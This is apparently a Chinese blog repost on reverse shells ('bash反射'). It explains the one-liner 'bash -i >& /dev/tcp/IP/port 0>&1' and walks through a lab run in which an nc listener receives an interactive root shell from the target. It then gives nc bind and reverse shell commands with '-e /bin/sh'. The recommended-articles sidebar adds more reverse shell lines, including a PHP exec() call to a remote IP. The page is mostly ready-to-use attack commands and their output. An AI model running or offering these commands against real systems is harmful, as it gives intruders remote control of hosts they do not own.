shell反射

最新推荐文章于 2022-01-18 12:01:28 发布
最新推荐文章于 2022-01-18 12:01:28 发布
阅读量687 收藏 1
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/zhangb8042/p/10494247.html
版权

一、介绍

bash反射就是反弹一个交互的shell,类似ssh连接,可以执行命令

 

二、使用命令

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

 

bash -i 是打开一个交互的bash

>&  是将标准错误输出定向到标准输出中。

 /dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

0>&1 是将标准输入重定向到标准输出中。

 

 

三、实战测试

攻击端

 

##安装nc
yum install nc -y

#使用nc打开一个端口(我这使用80)
[root@server ~]# nc -v -l -p  80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80

  

被攻击端
[root@localhost~]#/bin/bash -i >& /dev/tcp/10.0.0.1/80 0>&1

  

 

查看攻击端
[root@server  ~]# nc -v -l -p  80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.0.0.141.
Ncat: Connection from 10.0.0.141:56507.
[root@localhost~]#   //变成了被攻击端的界面
#执行命令测试
[root@localhost~]#pwd 
pwd 
/root 
[root@localhost~]#hostname 
hostname 
localhost.localdomain 
[root@localhost~]#ll /^H

 

nc正向连接

被攻击端: nc -lvp  8080 -e /bin/sh
攻击端: nc -nvl 10.0.0.138 8080

nc反向连接  

攻击端:nc  10.0.0.138 8080
被攻击端: nc -vv 10.0.0.132 8080 -e /bin/sh

  

 

转载于:https://www.cnblogs.com/zhangb8042/p/10494247.html

weixin_30237719
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句话反射shell
tudoutest的博客
12-28 865
通过一句话反射一个shell   首先你在自己的及其上起一个进程来监听 mypc$ nc -l -v 0.0.0.0 4444   ip就是你自己的ip 端口任意(我这里写的是4444) 注意这个端口不要被自己的防火墙过滤掉 比如ubuntu上可以用 ufw allow 端口号 来打开端口。   后面就是到要反射的及其上输入命令   Bash bash -i >&...
关于shell的几个不为人知却十分有用的命令分享
01-10
最近一直在使用Linux操作系统,也熟知一些简单的命令,那么下面我将介绍几个不为人知却十分有用的命令: 1.mtr命令,查看mtr运行的主机和某个网站的直接网络连接,如下 ...显示一下内容 代码如下: ...
Power Shell反射
ilovewqf的博客
06-08 912
我总是拿Java的思维去理解powershell,power shell的get-member,按我的思维模式来说,就是反射。比如对1进行反射PS C:\work> 1|get-Member TypeName:System.Int32Name MemberType Definition ---- ---------- ---------- CompareTo M
反射Shell > 后门程序 > 挖矿程序 --处理篇之二
一杯咖啡的渗透记忆
04-10 605
反射Shell > 后门程序 > 挖矿程序 --处理篇之一 前篇会对问题做一些说明,已经有了问题追踪阐述: 补充一个点: 查看发现/etc/ld.so.preload对应的实际路径为:上面splunk根目录下lib目录里面的一个文件: 处理方案: 1. 将上面的文件备份如上,同时杀掉之前splunk.pid里面的所有进程。 这边强调一下是同时,命令如下:ki...
java 反射执行shell,Java调用运行shell脚本
weixin_33838871的博客
03-14 126
做一下记录 ` private static Logger logger = Logger.getLogger(JavaRunShellService.class); //基本路径 private static final String basePath = "/usr/local/java-run/logs/"; //记录Shell执行状况的日志文件的位置(绝对路径) private stati...
反射Shell > 后门程序 > 挖矿程序 --处理篇之一
一杯咖啡的渗透记忆
04-10 918
时间:2019-4-9 14:00 接到运维的工单 现象:服务器安全报警如下图 问题追踪: 1. 怕影响到其他机器,所以第一步将该服务器隔离。 注:至于怎么隔离?一般基础云服务商都会提供,前提你已经用了他们的基础安全产品。如果没有的话,只能断网。 2. 远程连接这台机器: a. 进程查看 top命令显示如下: b. 查看反弹shell的路径下的文件: ...
远程反射jar包.zip
01-21
远程反射jar包.zip
Python封装shell命令实例分析
12-25
本文实例讲述了Python封装shell命令的方法。分享给大家供大家参考。具体实现方法如下: # -*- coding: utf-8 -*- import os import subprocess import signal import pwd import sys class MockLogger(object): ''...
简单了解python反射机制的一些知识
12-31
比如Python/JavaScript / Perl /Shell等都是解释型语言。 python是一门解释型语言,因此对于反射机制支持很好。在python中支持反射机制的函数有getattr()、setattr()、delattr()、exec()、eval()、
arcolinux-reflector-simple
04-03
简单的反射器 由endeavouros友善地提供-garuda linux 代码和pkgbuild混合 reflector命令的简单GUI。 截屏: 有关简单反射器配置的注意事项 支持配置文件/etc/reflector-simple.conf 如果/etc/reflector-simple....
java 反射执行shell_Java使用反射来获取泛型信息
weixin_32894769的博客
02-24 102
Java通过指定类对应的Class对象,程序可以获得该类里包括的所有Field,不管该Field使用private修饰,还是使用public修饰。获得了Field对象后,就可以很容易的获得该Field的数据类型,例如,下面的代码便是获得该Field对象foeld的类型:Class> type = field.getType();但是通过这种方式只对普通类型的Field有效,如果该Field的...
java 反射执行shell_Java执行Shell脚本
weixin_42510600的博客
02-24 121
Linux 系统下采用 Java 执行 Shell 脚本,直接上代码:package com.smbea.demo;import java.io.BufferedReader;import java.io.IOException;import java.io.InputStreamReader;/*** 执行 Shell 脚本* @author hapday* @date 2017年3月14日 @...
《快学 Go 语言》第 14 课 —— 反射
codehole_的博客
12-24 186
反射是 Go 语言学习的一个难点,但也是非常重要的一个知识点。反射是洞悉 Go 语言类型系统设计的法宝,Go 语言的 ORM 库离不开它,Go 语言的 json 序列化库...
windows 反弹shell_使用shellpy建立反向Shell
weixin_39946500的博客
12-12 118
Shellpy地址:https://github.com/DarkSecDevelopers/Shellpy Shellpy是一个小脚本工具,可以在windows下建议一个反向的shell。使用说明:下载工具后,打开run.py,修改其中的IP地址和端口,IP为接收shell机器的IP,端口自定义。修改成自己的后,我们就可以运行这个脚本,根据后面代码可以看到,脚本首先会将反弹shell的...
Linux Shell 学习笔记
xyz的专栏
06-14 256
Shell 变量 Shell Array数组 Shell Map数组 Shell Function函数 Shell Native Call本地调用 Shell 流程控制 Shell 输入输出 Shell 可移植性与扩展 Shell Security 安全问题
谈谈反射
啊浪的博客
06-13 606
简介JAVA反射机制是在运行状态中,对于任意一个类,都能够知道这个类的所有属性和方法;对于任意一个对象,都能够调用它的任意一个方法;简单说就是,只要给定类的名字,那么就可以通过反射机制来获得类的所有信息。原理Class文件由类装载器装载后,在JVM中将形成一份描述Class结构的元信息对象(Class反射对象),通过该元信息对象可以获知Class的结构信息。Class反射对象:描述类语义结构,可以...
反弹shell原理和实现
u012830303的博客
01-18 3502
当一些框架和代码,不小心让可执行shell命令的函数存在注入漏洞时,会被利用注入漏洞执行一些shell命令。入侵者为了防止漏洞被修复,无法通过正向链接侵入服务器时,会被利用shell反弹原理种马。 首先,侵入者会利用注入参数,创建一个shell.php文件,文件内容如下 通过web访问并执行shell.php文件 exec('bash -i &> /dev/tcp/10.201.61.194/5566 0>&1'); 这条命令的作用是,在服务器建立一个可以与10.201.61.
Shell中字符串反转的几种技巧
杰瑞的专栏
07-09 8919
【方法一】利用rev命令 备注: 1) rev命令可以对字符串进行反转 2) rev命令还可以对一个或多个文件进行反转 【方法二】利用sed命令s参数来替换 备注: 1) (.)-->正则表达式中分组匹配,匹配到之后在用具体位置参数\3\2\1来实现反转 2) 同时使用-r参数,表示扩展正则表达式,那样的话,就无需使用反斜杠来转译了 【方法三
用nc反弹shell真有意思哈哈
热门推荐
公众号shadow sock7
06-17 1万+
先在bee(192.168.170.130)上面bee@bee-box:/tmp$ nc -vlp 4444 -e /bin/bash listening on [any] 4444 ... 192.168.170.1: inverse host lookup failed: Unknown host connect to [192.168.170.130] from (UNKNOWN) [192.
java过滤shell命令
最新发布
03-29
3. 使用Java的反射机制来过滤shell命令。这种方法需要在代码中声明一个黑名单,然后使用反射来检查是否包含该命令。 4. 使用Java的安全管理器来限制shell命令的执行。可以通过编写自定义的SecurityManager类来实现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值